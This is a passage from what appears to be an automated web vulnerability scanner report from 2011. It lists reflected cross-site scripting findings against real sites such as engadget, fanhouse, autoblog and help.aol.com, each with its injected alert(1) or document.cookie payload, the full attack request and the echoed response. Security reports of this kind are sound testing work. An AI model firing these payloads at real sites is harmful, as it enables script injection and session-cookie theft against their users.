k0","reg":"tx","refurl":"http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889\u003d1","fbbb8"-alert(1)-"b15924c4453":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}
...[SNIP]...

1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cedc8"-alert(1)-"2d1d201c850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cedc8"-alert(1)-"2d1d201c850=1 HTTP/1.1
Host: es.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:41 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=16bc50a63470ff01e195d9e3bc2eeb6b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 106129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Engadget en espa..ol
...[SNIP]...
annel="wb.engadgetsp";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,es.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Inactive";
s_265.prop2="Home";
s_265.prop12="http://es.engadget.com/?cedc8"-alert(1)-"2d1d201c850=1";
s_265.prop16="Engadget en espa..ol";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="247";

var s_code=s_265.t();if(s_code)document.write(s_co
...[SNIP]...

1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fantasy.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31dbc"-alert(1)-"afc965ac949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?31dbc"-alert(1)-"afc965ac949=1 HTTP/1.1
Host: fantasy.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 75771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
e.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Fantasy";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://fantasy.fanhouse.com/?31dbc"-alert(1)-"afc965ac949=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.106. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4c8<script>alert(1)</script>e89e8f1416c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000820
Content-Length: 68
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:33:30 GMT
Connection: close

Not Found: /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css

1.107. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e302f<script>alert(1)</script>440171cb83a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000805
Content-Length: 68
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:33:30 GMT
Connection: close

Not Found: /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a

1.108. http://fonts.citysbest.com/uni0vle.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /uni0vle.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb692<script>alert(1)</script>13f97bad00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uni0vle.jseb692<script>alert(1)</script>13f97bad00a HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.001252
Content-Length: 63
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 21:46:56 GMT
Connection: close

Not Found: /uni0vle.jseb692<script>alert(1)</script>13f97bad00a

1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://golf.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3cc6"-alert(1)-"97283dc744a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f3cc6"-alert(1)-"97283dc744a=1 HTTP/1.1
Host: golf.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:01 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999884
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 65581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
anhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Golf";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://golf.fanhouse.com/?f3cc6"-alert(1)-"97283dc744a=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafda"><script>alert(1)</script>dce0aa22300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?dafda"><script>alert(1)</script>dce0aa22300=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:04 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link rel="canonical" href="http://green.autoblog.com/?dafda"><script>alert(1)</script>dce0aa22300=1"/>
...[SNIP]...

1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9f0"-alert(1)-"f846c73bc45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fd9f0"-alert(1)-"f846c73bc45=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:05 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Keep-Alive: timeout=5, max=999989
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 97682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
_265.pageType="";
s_265.linkInternalFilters="javascript:,autobloggreen.com,green.autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Home";
s_265.prop12="http://green.autoblog.com/?fd9f0"-alert(1)-"f846c73bc45=1";
s_265.prop16="Autoblog Green &mdash; We Obsessively Cover The Green Scene";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6d6"-alert(1)-"cc4365a87c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:48 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:22:47 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 121605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
green.autoblog.com";
s_265.mmxgo = true;
s_265.prop1="Autoblog";
s_265.prop2="Post";
s_265.prop12="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1";
s_265.prop16="Video: How apartment dwellers can charge their electric vehicles &mdash; Autoblog Green";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop9="bsd:19829683";

var s_code=s
...[SNIP]...

1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.autoblog.com
Path:   /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b2f"><script>alert(1)</script>bb0719d741c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:48 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:22:47 GMT; path=/
Keep-Alive: timeout=5, max=999993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 121677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<link rel="canonical" href="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1"/>
...[SNIP]...

1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.aol.com
Path:   /help/product/aim

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38f"><script>alert(1)</script>58a51860742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /help/product/aim?1d38f"><script>alert(1)</script>58a51860742=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=DECB310EF6EFBE26B4A427A6F179C4AD.help-dtc32; Path=/help
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4d4b145525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:24:33 GMT;path=/;httponly
Content-Length: 16811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <script type
...[SNIP]...
<TextArea name="1d38f"><script>alert(1)</script>58a51860742" style="display:none;visibility:hide">
...[SNIP]...

1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.aol.com
Path:   /help/product/aim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15650"><script>alert(1)</script>bae15fcead9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/product/aim/?15650"><script>alert(1)</script>bae15fcead9=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:21:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=ED090F24F45894D88EFF6CE9F51FA687.help-dtc37; Path=/help
Keep-Alive: timeout=15, max=74
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4a74645525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:21:53 GMT;path=/;httponly
Content-Length: 16811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <script type
...[SNIP]...
<TextArea name="15650"><script>alert(1)</script>bae15fcead9" style="display:none;visibility:hide">
...[SNIP]...

1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://japanese.engadget.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e744"-alert(1)-"5dc6583bede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?1e744"-alert(1)-"5dc6583bede=1 HTTP/1.1
Host: japanese.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:45 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=328aae74cc9b3a38a8e59774045c0fa7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60
Pragma: no-cache
Keep-Alive: timeout=5, max=999881
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html" c
...[SNIP]...
el="jp.engadget";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,japanese.engadget.com";
s_265.mmxgo = true;
s_265.prop1="Home";
s_265.prop2="-";
s_265.prop12="http://japanese.engadget.com/?1e744"-alert(1)-"5dc6583bede=1";
s_265.prop16="";
s_265.prop17="Engadget";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="dtc";
s_265.prop22="221";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.117. http://jlinks.industrybrains.com/jsct [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c0c31<script>alert(1)</script>91610088e03 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 93

// Error: Unknown old section MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03

1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11208<script>alert(1)</script>01e1e582feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp&11208<script>alert(1)</script>01e1e582feb=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:07 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:07 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 11208<script>alert(1)</script>01e1e582feb

1.119. http://jlinks.industrybrains.com/jsct [tr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload aec99<script>alert(1)</script>9252672da8b was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTAaec99<script>alert(1)</script>9252672da8b&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 86

// Error: Site 85 has no section ELECTRONISTAaec99<script>alert(1)</script>9252672da8b

1.120. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6e2a8<script>alert(1)</script>5664779b5a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J055326e2a8<script>alert(1)</script>5664779b5a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://sports.aol.com/scores6d396%22-alert(document.cookie)-%222e6570a7b85
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
